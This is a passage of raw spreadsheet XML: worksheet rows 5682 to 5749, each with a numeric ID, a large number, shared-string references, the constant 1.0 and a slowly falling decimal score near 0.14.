        <v>4.1716753E7</v>
      </c>
      <c r="C5682" s="2" t="s">
        <v>5420</v>
      </c>
      <c r="D5682" s="2">
        <v>1.0</v>
      </c>
      <c r="E5682" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5682" s="2">
        <v>0.1406810035842294</v>
      </c>
    </row>
    <row r="5683" ht="15.75" customHeight="1">
      <c r="A5683" s="1">
        <v>32078.0</v>
      </c>
      <c r="B5683" s="2">
        <v>5382870.0</v>
      </c>
      <c r="C5683" s="2" t="s">
        <v>5421</v>
      </c>
      <c r="D5683" s="2">
        <v>1.0</v>
      </c>
      <c r="E5683" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5683" s="2">
        <v>0.1405723905723906</v>
      </c>
    </row>
    <row r="5684" ht="15.75" customHeight="1">
      <c r="A5684" s="1">
        <v>27739.0</v>
      </c>
      <c r="B5684" s="2">
        <v>2.3080792E7</v>
      </c>
      <c r="C5684" s="2" t="s">
        <v>5422</v>
      </c>
      <c r="D5684" s="2">
        <v>1.0</v>
      </c>
      <c r="E5684" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5684" s="2">
        <v>0.1404040404040404</v>
      </c>
    </row>
    <row r="5685" ht="15.75" customHeight="1">
      <c r="A5685" s="1">
        <v>22115.0</v>
      </c>
      <c r="B5685" s="2">
        <v>3.097656E7</v>
      </c>
      <c r="C5685" s="2" t="s">
        <v>5423</v>
      </c>
      <c r="D5685" s="2">
        <v>1.0</v>
      </c>
      <c r="E5685" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5685" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="5686" ht="15.75" customHeight="1">
      <c r="A5686" s="1">
        <v>23740.0</v>
      </c>
      <c r="B5686" s="2">
        <v>7361273.0</v>
      </c>
      <c r="C5686" s="2" t="s">
        <v>5424</v>
      </c>
      <c r="D5686" s="2">
        <v>1.0</v>
      </c>
      <c r="E5686" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5686" s="2">
        <v>0.1402116402116403</v>
      </c>
    </row>
    <row r="5687" ht="15.75" customHeight="1">
      <c r="A5687" s="1">
        <v>31924.0</v>
      </c>
      <c r="B5687" s="2">
        <v>5304694.0</v>
      </c>
      <c r="C5687" s="2" t="s">
        <v>5425</v>
      </c>
      <c r="D5687" s="2">
        <v>1.0</v>
      </c>
      <c r="E5687" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5687" s="2">
        <v>0.1401808785529716</v>
      </c>
    </row>
    <row r="5688" ht="15.75" customHeight="1">
      <c r="A5688" s="1">
        <v>31104.0</v>
      </c>
      <c r="B5688" s="2">
        <v>4.8595191E7</v>
      </c>
      <c r="C5688" s="2" t="s">
        <v>5426</v>
      </c>
      <c r="D5688" s="2">
        <v>1.0</v>
      </c>
      <c r="E5688" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5688" s="2">
        <v>0.1400625978090767</v>
      </c>
    </row>
    <row r="5689" ht="15.75" customHeight="1">
      <c r="A5689" s="1">
        <v>24613.0</v>
      </c>
      <c r="B5689" s="2">
        <v>1.1439888E7</v>
      </c>
      <c r="C5689" s="2" t="s">
        <v>5427</v>
      </c>
      <c r="D5689" s="2">
        <v>1.0</v>
      </c>
      <c r="E5689" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5689" s="2">
        <v>0.139943741209564</v>
      </c>
    </row>
    <row r="5690" ht="15.75" customHeight="1">
      <c r="A5690" s="1">
        <v>22973.0</v>
      </c>
      <c r="B5690" s="2">
        <v>4.9258092E7</v>
      </c>
      <c r="C5690" s="2" t="s">
        <v>5428</v>
      </c>
      <c r="D5690" s="2">
        <v>1.0</v>
      </c>
      <c r="E5690" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5690" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="5691" ht="15.75" customHeight="1">
      <c r="A5691" s="1">
        <v>23139.0</v>
      </c>
      <c r="B5691" s="2">
        <v>5.1603109E7</v>
      </c>
      <c r="C5691" s="2" t="s">
        <v>5429</v>
      </c>
      <c r="D5691" s="2">
        <v>1.0</v>
      </c>
      <c r="E5691" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5691" s="2">
        <v>0.1398809523809524</v>
      </c>
    </row>
    <row r="5692" ht="15.75" customHeight="1">
      <c r="A5692" s="1">
        <v>19893.0</v>
      </c>
      <c r="B5692" s="2">
        <v>5.7289602E7</v>
      </c>
      <c r="C5692" s="2" t="s">
        <v>5430</v>
      </c>
      <c r="D5692" s="2">
        <v>1.0</v>
      </c>
      <c r="E5692" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5692" s="2">
        <v>0.1398148148148148</v>
      </c>
    </row>
    <row r="5693" ht="15.75" customHeight="1">
      <c r="A5693" s="1">
        <v>23937.0</v>
      </c>
      <c r="B5693" s="2">
        <v>8745469.0</v>
      </c>
      <c r="C5693" s="2" t="s">
        <v>5431</v>
      </c>
      <c r="D5693" s="2">
        <v>1.0</v>
      </c>
      <c r="E5693" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5693" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="5694" ht="15.75" customHeight="1">
      <c r="A5694" s="1">
        <v>32031.0</v>
      </c>
      <c r="B5694" s="2">
        <v>5362109.0</v>
      </c>
      <c r="C5694" s="2" t="s">
        <v>5432</v>
      </c>
      <c r="D5694" s="2">
        <v>1.0</v>
      </c>
      <c r="E5694" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5694" s="2">
        <v>0.1397569444444445</v>
      </c>
    </row>
    <row r="5695" ht="15.75" customHeight="1">
      <c r="A5695" s="1">
        <v>27509.0</v>
      </c>
      <c r="B5695" s="2">
        <v>2.212781E7</v>
      </c>
      <c r="C5695" s="2" t="s">
        <v>5433</v>
      </c>
      <c r="D5695" s="2">
        <v>1.0</v>
      </c>
      <c r="E5695" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5695" s="2">
        <v>0.1397058823529412</v>
      </c>
    </row>
    <row r="5696" ht="15.75" customHeight="1">
      <c r="A5696" s="1">
        <v>25700.0</v>
      </c>
      <c r="B5696" s="2">
        <v>1.4529555E7</v>
      </c>
      <c r="C5696" s="2" t="s">
        <v>5434</v>
      </c>
      <c r="D5696" s="2">
        <v>1.0</v>
      </c>
      <c r="E5696" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5696" s="2">
        <v>0.1396604938271605</v>
      </c>
    </row>
    <row r="5697" ht="15.75" customHeight="1">
      <c r="A5697" s="1">
        <v>24459.0</v>
      </c>
      <c r="B5697" s="2">
        <v>1.0944126E7</v>
      </c>
      <c r="C5697" s="2" t="s">
        <v>5435</v>
      </c>
      <c r="D5697" s="2">
        <v>1.0</v>
      </c>
      <c r="E5697" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5697" s="2">
        <v>0.1395833333333334</v>
      </c>
    </row>
    <row r="5698" ht="15.75" customHeight="1">
      <c r="A5698" s="1">
        <v>29093.0</v>
      </c>
      <c r="B5698" s="2">
        <v>3.0389828E7</v>
      </c>
      <c r="C5698" s="2" t="s">
        <v>5436</v>
      </c>
      <c r="D5698" s="2">
        <v>1.0</v>
      </c>
      <c r="E5698" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5698" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="5699" ht="15.75" customHeight="1">
      <c r="A5699" s="1">
        <v>29864.0</v>
      </c>
      <c r="B5699" s="2">
        <v>3.5904074E7</v>
      </c>
      <c r="C5699" s="2" t="s">
        <v>5437</v>
      </c>
      <c r="D5699" s="2">
        <v>1.0</v>
      </c>
      <c r="E5699" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5699" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="5700" ht="15.75" customHeight="1">
      <c r="A5700" s="1">
        <v>32690.0</v>
      </c>
      <c r="B5700" s="2">
        <v>5953420.0</v>
      </c>
      <c r="C5700" s="2" t="s">
        <v>5438</v>
      </c>
      <c r="D5700" s="2">
        <v>1.0</v>
      </c>
      <c r="E5700" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5700" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="5701" ht="15.75" customHeight="1">
      <c r="A5701" s="1">
        <v>33577.0</v>
      </c>
      <c r="B5701" s="2">
        <v>8276419.0</v>
      </c>
      <c r="C5701" s="2" t="s">
        <v>5439</v>
      </c>
      <c r="D5701" s="2">
        <v>1.0</v>
      </c>
      <c r="E5701" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5701" s="2">
        <v>0.1393762183235868</v>
      </c>
    </row>
    <row r="5702" ht="15.75" customHeight="1">
      <c r="A5702" s="1">
        <v>22839.0</v>
      </c>
      <c r="B5702" s="2">
        <v>4.6606506E7</v>
      </c>
      <c r="C5702" s="2" t="s">
        <v>5370</v>
      </c>
      <c r="D5702" s="2">
        <v>1.0</v>
      </c>
      <c r="E5702" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5702" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="5703" ht="15.75" customHeight="1">
      <c r="A5703" s="1">
        <v>33524.0</v>
      </c>
      <c r="B5703" s="2">
        <v>8112450.0</v>
      </c>
      <c r="C5703" s="2" t="s">
        <v>5440</v>
      </c>
      <c r="D5703" s="2">
        <v>1.0</v>
      </c>
      <c r="E5703" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5703" s="2">
        <v>0.1393162393162394</v>
      </c>
    </row>
    <row r="5704" ht="15.75" customHeight="1">
      <c r="A5704" s="1">
        <v>23521.0</v>
      </c>
      <c r="B5704" s="2">
        <v>5857362.0</v>
      </c>
      <c r="C5704" s="2" t="s">
        <v>5441</v>
      </c>
      <c r="D5704" s="2">
        <v>1.0</v>
      </c>
      <c r="E5704" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5704" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="5705" ht="15.75" customHeight="1">
      <c r="A5705" s="1">
        <v>23746.0</v>
      </c>
      <c r="B5705" s="2">
        <v>7394445.0</v>
      </c>
      <c r="C5705" s="2" t="s">
        <v>5442</v>
      </c>
      <c r="D5705" s="2">
        <v>1.0</v>
      </c>
      <c r="E5705" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5705" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="5706" ht="15.75" customHeight="1">
      <c r="A5706" s="1">
        <v>29261.0</v>
      </c>
      <c r="B5706" s="2">
        <v>3.0976645E7</v>
      </c>
      <c r="C5706" s="2" t="s">
        <v>5443</v>
      </c>
      <c r="D5706" s="2">
        <v>1.0</v>
      </c>
      <c r="E5706" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5706" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="5707" ht="15.75" customHeight="1">
      <c r="A5707" s="1">
        <v>30525.0</v>
      </c>
      <c r="B5707" s="2">
        <v>4.029054E7</v>
      </c>
      <c r="C5707" s="2" t="s">
        <v>5444</v>
      </c>
      <c r="D5707" s="2">
        <v>1.0</v>
      </c>
      <c r="E5707" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5707" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="5708" ht="15.75" customHeight="1">
      <c r="A5708" s="1">
        <v>30629.0</v>
      </c>
      <c r="B5708" s="2">
        <v>4136218.0</v>
      </c>
      <c r="C5708" s="2" t="s">
        <v>5445</v>
      </c>
      <c r="D5708" s="2">
        <v>1.0</v>
      </c>
      <c r="E5708" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5708" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="5709" ht="15.75" customHeight="1">
      <c r="A5709" s="1">
        <v>33153.0</v>
      </c>
      <c r="B5709" s="2">
        <v>7073032.0</v>
      </c>
      <c r="C5709" s="2" t="s">
        <v>5446</v>
      </c>
      <c r="D5709" s="2">
        <v>1.0</v>
      </c>
      <c r="E5709" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5709" s="2">
        <v>0.138888888888889</v>
      </c>
    </row>
    <row r="5710" ht="15.75" customHeight="1">
      <c r="A5710" s="1">
        <v>9281.0</v>
      </c>
      <c r="B5710" s="2">
        <v>5.5518556E7</v>
      </c>
      <c r="C5710" s="2" t="s">
        <v>5447</v>
      </c>
      <c r="D5710" s="2">
        <v>1.0</v>
      </c>
      <c r="E5710" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5710" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="5711" ht="15.75" customHeight="1">
      <c r="A5711" s="1">
        <v>22804.0</v>
      </c>
      <c r="B5711" s="2">
        <v>4.5806432E7</v>
      </c>
      <c r="C5711" s="2" t="s">
        <v>5448</v>
      </c>
      <c r="D5711" s="2">
        <v>1.0</v>
      </c>
      <c r="E5711" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5711" s="2">
        <v>0.1388888888888889</v>
      </c>
    </row>
    <row r="5712" ht="15.75" customHeight="1">
      <c r="A5712" s="1">
        <v>25398.0</v>
      </c>
      <c r="B5712" s="2">
        <v>1.3724178E7</v>
      </c>
      <c r="C5712" s="2" t="s">
        <v>5449</v>
      </c>
      <c r="D5712" s="2">
        <v>1.0</v>
      </c>
      <c r="E5712" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5712" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="5713" ht="15.75" customHeight="1">
      <c r="A5713" s="1">
        <v>31792.0</v>
      </c>
      <c r="B5713" s="2">
        <v>5236538.0</v>
      </c>
      <c r="C5713" s="2" t="s">
        <v>5450</v>
      </c>
      <c r="D5713" s="2">
        <v>1.0</v>
      </c>
      <c r="E5713" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5713" s="2">
        <v>0.1384479717813052</v>
      </c>
    </row>
    <row r="5714" ht="15.75" customHeight="1">
      <c r="A5714" s="1">
        <v>17918.0</v>
      </c>
      <c r="B5714" s="2">
        <v>5.115638E7</v>
      </c>
      <c r="C5714" s="2" t="s">
        <v>5451</v>
      </c>
      <c r="D5714" s="2">
        <v>1.0</v>
      </c>
      <c r="E5714" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5714" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5715" ht="15.75" customHeight="1">
      <c r="A5715" s="1">
        <v>20156.0</v>
      </c>
      <c r="B5715" s="2">
        <v>1.0257915E7</v>
      </c>
      <c r="C5715" s="2" t="s">
        <v>5452</v>
      </c>
      <c r="D5715" s="2">
        <v>1.0</v>
      </c>
      <c r="E5715" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5715" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5716" ht="15.75" customHeight="1">
      <c r="A5716" s="1">
        <v>27259.0</v>
      </c>
      <c r="B5716" s="2">
        <v>2.1161357E7</v>
      </c>
      <c r="C5716" s="2" t="s">
        <v>5453</v>
      </c>
      <c r="D5716" s="2">
        <v>1.0</v>
      </c>
      <c r="E5716" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5716" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5717" ht="15.75" customHeight="1">
      <c r="A5717" s="1">
        <v>27649.0</v>
      </c>
      <c r="B5717" s="2">
        <v>2.2803115E7</v>
      </c>
      <c r="C5717" s="2" t="s">
        <v>5454</v>
      </c>
      <c r="D5717" s="2">
        <v>1.0</v>
      </c>
      <c r="E5717" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5717" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5718" ht="15.75" customHeight="1">
      <c r="A5718" s="1">
        <v>29369.0</v>
      </c>
      <c r="B5718" s="2">
        <v>3.1676733E7</v>
      </c>
      <c r="C5718" s="2" t="s">
        <v>5455</v>
      </c>
      <c r="D5718" s="2">
        <v>1.0</v>
      </c>
      <c r="E5718" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5718" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5719" ht="15.75" customHeight="1">
      <c r="A5719" s="1">
        <v>30254.0</v>
      </c>
      <c r="B5719" s="2">
        <v>3.7595203E7</v>
      </c>
      <c r="C5719" s="2" t="s">
        <v>5456</v>
      </c>
      <c r="D5719" s="2">
        <v>1.0</v>
      </c>
      <c r="E5719" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5719" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5720" ht="15.75" customHeight="1">
      <c r="A5720" s="1">
        <v>32122.0</v>
      </c>
      <c r="B5720" s="2">
        <v>5408951.0</v>
      </c>
      <c r="C5720" s="2" t="s">
        <v>5457</v>
      </c>
      <c r="D5720" s="2">
        <v>1.0</v>
      </c>
      <c r="E5720" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5720" s="2">
        <v>0.1384180790960453</v>
      </c>
    </row>
    <row r="5721" ht="15.75" customHeight="1">
      <c r="A5721" s="1">
        <v>15696.0</v>
      </c>
      <c r="B5721" s="2">
        <v>4.3900767E7</v>
      </c>
      <c r="C5721" s="2" t="s">
        <v>5458</v>
      </c>
      <c r="D5721" s="2">
        <v>1.0</v>
      </c>
      <c r="E5721" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5721" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5722" ht="15.75" customHeight="1">
      <c r="A5722" s="1">
        <v>20906.0</v>
      </c>
      <c r="B5722" s="2">
        <v>1.6279653E7</v>
      </c>
      <c r="C5722" s="2" t="s">
        <v>5459</v>
      </c>
      <c r="D5722" s="2">
        <v>1.0</v>
      </c>
      <c r="E5722" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5722" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5723" ht="15.75" customHeight="1">
      <c r="A5723" s="1">
        <v>22421.0</v>
      </c>
      <c r="B5723" s="2">
        <v>3.6089506E7</v>
      </c>
      <c r="C5723" s="2" t="s">
        <v>5460</v>
      </c>
      <c r="D5723" s="2">
        <v>1.0</v>
      </c>
      <c r="E5723" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5723" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5724" ht="15.75" customHeight="1">
      <c r="A5724" s="1">
        <v>24737.0</v>
      </c>
      <c r="B5724" s="2">
        <v>1.177941E7</v>
      </c>
      <c r="C5724" s="2" t="s">
        <v>5461</v>
      </c>
      <c r="D5724" s="2">
        <v>1.0</v>
      </c>
      <c r="E5724" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5724" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5725" ht="15.75" customHeight="1">
      <c r="A5725" s="1">
        <v>25196.0</v>
      </c>
      <c r="B5725" s="2">
        <v>1.3200714E7</v>
      </c>
      <c r="C5725" s="2" t="s">
        <v>5462</v>
      </c>
      <c r="D5725" s="2">
        <v>1.0</v>
      </c>
      <c r="E5725" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5725" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5726" ht="15.75" customHeight="1">
      <c r="A5726" s="1">
        <v>26419.0</v>
      </c>
      <c r="B5726" s="2">
        <v>1.7142113E7</v>
      </c>
      <c r="C5726" s="2" t="s">
        <v>5463</v>
      </c>
      <c r="D5726" s="2">
        <v>1.0</v>
      </c>
      <c r="E5726" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5726" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5727" ht="15.75" customHeight="1">
      <c r="A5727" s="1">
        <v>27147.0</v>
      </c>
      <c r="B5727" s="2">
        <v>2.0775019E7</v>
      </c>
      <c r="C5727" s="2" t="s">
        <v>5464</v>
      </c>
      <c r="D5727" s="2">
        <v>1.0</v>
      </c>
      <c r="E5727" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5727" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5728" ht="15.75" customHeight="1">
      <c r="A5728" s="1">
        <v>27439.0</v>
      </c>
      <c r="B5728" s="2">
        <v>2.1970445E7</v>
      </c>
      <c r="C5728" s="2" t="s">
        <v>5465</v>
      </c>
      <c r="D5728" s="2">
        <v>1.0</v>
      </c>
      <c r="E5728" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5728" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5729" ht="15.75" customHeight="1">
      <c r="A5729" s="1">
        <v>30290.0</v>
      </c>
      <c r="B5729" s="2">
        <v>3.7733046E7</v>
      </c>
      <c r="C5729" s="2" t="s">
        <v>5466</v>
      </c>
      <c r="D5729" s="2">
        <v>1.0</v>
      </c>
      <c r="E5729" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5729" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5730" ht="15.75" customHeight="1">
      <c r="A5730" s="1">
        <v>34122.0</v>
      </c>
      <c r="B5730" s="2">
        <v>9768682.0</v>
      </c>
      <c r="C5730" s="2" t="s">
        <v>5467</v>
      </c>
      <c r="D5730" s="2">
        <v>1.0</v>
      </c>
      <c r="E5730" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5730" s="2">
        <v>0.1384180790960452</v>
      </c>
    </row>
    <row r="5731" ht="15.75" customHeight="1">
      <c r="A5731" s="1">
        <v>25533.0</v>
      </c>
      <c r="B5731" s="2">
        <v>1.4230812E7</v>
      </c>
      <c r="C5731" s="2" t="s">
        <v>5468</v>
      </c>
      <c r="D5731" s="2">
        <v>1.0</v>
      </c>
      <c r="E5731" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5731" s="2">
        <v>0.1384099616858238</v>
      </c>
    </row>
    <row r="5732" ht="15.75" customHeight="1">
      <c r="A5732" s="1">
        <v>32032.0</v>
      </c>
      <c r="B5732" s="2">
        <v>5362109.0</v>
      </c>
      <c r="C5732" s="2" t="s">
        <v>5432</v>
      </c>
      <c r="D5732" s="2">
        <v>1.0</v>
      </c>
      <c r="E5732" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5732" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="5733" ht="15.75" customHeight="1">
      <c r="A5733" s="1">
        <v>33349.0</v>
      </c>
      <c r="B5733" s="2">
        <v>7602407.0</v>
      </c>
      <c r="C5733" s="2" t="s">
        <v>5469</v>
      </c>
      <c r="D5733" s="2">
        <v>1.0</v>
      </c>
      <c r="E5733" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5733" s="2">
        <v>0.1380208333333334</v>
      </c>
    </row>
    <row r="5734" ht="15.75" customHeight="1">
      <c r="A5734" s="1">
        <v>22263.0</v>
      </c>
      <c r="B5734" s="2">
        <v>3.2963333E7</v>
      </c>
      <c r="C5734" s="2" t="s">
        <v>5470</v>
      </c>
      <c r="D5734" s="2">
        <v>1.0</v>
      </c>
      <c r="E5734" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5734" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="5735" ht="15.75" customHeight="1">
      <c r="A5735" s="1">
        <v>25084.0</v>
      </c>
      <c r="B5735" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C5735" s="2" t="s">
        <v>5471</v>
      </c>
      <c r="D5735" s="2">
        <v>1.0</v>
      </c>
      <c r="E5735" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5735" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="5736" ht="15.75" customHeight="1">
      <c r="A5736" s="1">
        <v>32758.0</v>
      </c>
      <c r="B5736" s="2">
        <v>6053961.0</v>
      </c>
      <c r="C5736" s="2" t="s">
        <v>5472</v>
      </c>
      <c r="D5736" s="2">
        <v>1.0</v>
      </c>
      <c r="E5736" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5736" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="5737" ht="15.75" customHeight="1">
      <c r="A5737" s="1">
        <v>33479.0</v>
      </c>
      <c r="B5737" s="2">
        <v>7997292.0</v>
      </c>
      <c r="C5737" s="2" t="s">
        <v>5473</v>
      </c>
      <c r="D5737" s="2">
        <v>1.0</v>
      </c>
      <c r="E5737" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5737" s="2">
        <v>0.137962962962963</v>
      </c>
    </row>
    <row r="5738" ht="15.75" customHeight="1">
      <c r="A5738" s="1">
        <v>25387.0</v>
      </c>
      <c r="B5738" s="2">
        <v>1.3680423E7</v>
      </c>
      <c r="C5738" s="2" t="s">
        <v>5474</v>
      </c>
      <c r="D5738" s="2">
        <v>1.0</v>
      </c>
      <c r="E5738" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5738" s="2">
        <v>0.1378968253968254</v>
      </c>
    </row>
    <row r="5739" ht="15.75" customHeight="1">
      <c r="A5739" s="1">
        <v>1837.0</v>
      </c>
      <c r="B5739" s="2">
        <v>2.9374519E7</v>
      </c>
      <c r="C5739" s="2" t="s">
        <v>5475</v>
      </c>
      <c r="D5739" s="2">
        <v>1.0</v>
      </c>
      <c r="E5739" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5739" s="2">
        <v>0.1375227686703097</v>
      </c>
    </row>
    <row r="5740" ht="15.75" customHeight="1">
      <c r="A5740" s="1">
        <v>20331.0</v>
      </c>
      <c r="B5740" s="2">
        <v>1.1521893E7</v>
      </c>
      <c r="C5740" s="2" t="s">
        <v>5476</v>
      </c>
      <c r="D5740" s="2">
        <v>1.0</v>
      </c>
      <c r="E5740" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5740" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="5741" ht="15.75" customHeight="1">
      <c r="A5741" s="1">
        <v>25608.0</v>
      </c>
      <c r="B5741" s="2">
        <v>1.4396559E7</v>
      </c>
      <c r="C5741" s="2" t="s">
        <v>5477</v>
      </c>
      <c r="D5741" s="2">
        <v>1.0</v>
      </c>
      <c r="E5741" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5741" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="5742" ht="15.75" customHeight="1">
      <c r="A5742" s="1">
        <v>31382.0</v>
      </c>
      <c r="B5742" s="2">
        <v>4998035.0</v>
      </c>
      <c r="C5742" s="2" t="s">
        <v>5478</v>
      </c>
      <c r="D5742" s="2">
        <v>1.0</v>
      </c>
      <c r="E5742" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5742" s="2">
        <v>0.1374269005847954</v>
      </c>
    </row>
    <row r="5743" ht="15.75" customHeight="1">
      <c r="A5743" s="1">
        <v>26217.0</v>
      </c>
      <c r="B5743" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C5743" s="2" t="s">
        <v>5479</v>
      </c>
      <c r="D5743" s="2">
        <v>1.0</v>
      </c>
      <c r="E5743" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5743" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="5744" ht="15.75" customHeight="1">
      <c r="A5744" s="1">
        <v>31882.0</v>
      </c>
      <c r="B5744" s="2">
        <v>5.2866822E7</v>
      </c>
      <c r="C5744" s="2" t="s">
        <v>5480</v>
      </c>
      <c r="D5744" s="2">
        <v>1.0</v>
      </c>
      <c r="E5744" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5744" s="2">
        <v>0.1374269005847953</v>
      </c>
    </row>
    <row r="5745" ht="15.75" customHeight="1">
      <c r="A5745" s="1">
        <v>23471.0</v>
      </c>
      <c r="B5745" s="2">
        <v>5.7199486E7</v>
      </c>
      <c r="C5745" s="2" t="s">
        <v>5481</v>
      </c>
      <c r="D5745" s="2">
        <v>1.0</v>
      </c>
      <c r="E5745" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5745" s="2">
        <v>0.1372053872053872</v>
      </c>
    </row>
    <row r="5746" ht="15.75" customHeight="1">
      <c r="A5746" s="1">
        <v>27848.0</v>
      </c>
      <c r="B5746" s="2">
        <v>2.3425306E7</v>
      </c>
      <c r="C5746" s="2" t="s">
        <v>5482</v>
      </c>
      <c r="D5746" s="2">
        <v>1.0</v>
      </c>
      <c r="E5746" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5746" s="2">
        <v>0.1370967741935484</v>
      </c>
    </row>
    <row r="5747" ht="15.75" customHeight="1">
      <c r="A5747" s="1">
        <v>23112.0</v>
      </c>
      <c r="B5747" s="2">
        <v>5.1159616E7</v>
      </c>
      <c r="C5747" s="2" t="s">
        <v>5483</v>
      </c>
      <c r="D5747" s="2">
        <v>1.0</v>
      </c>
      <c r="E5747" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5747" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="5748" ht="15.75" customHeight="1">
      <c r="A5748" s="1">
        <v>25814.0</v>
      </c>
      <c r="B5748" s="2">
        <v>1.4767855E7</v>
      </c>
      <c r="C5748" s="2" t="s">
        <v>5484</v>
      </c>
      <c r="D5748" s="2">
        <v>1.0</v>
      </c>
      <c r="E5748" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5748" s="2">
        <v>0.1369731800766284</v>
      </c>
    </row>
    <row r="5749" ht="15.75" customHeight="1">
      <c r="A5749" s="1">
        <v>28783.0</v>
      </c>
      <c r="B5749" s="2">
        <v>2.844023E7</v>
      </c>
      <c r="C5749" s="2" t="s">
        <v>5485</v>
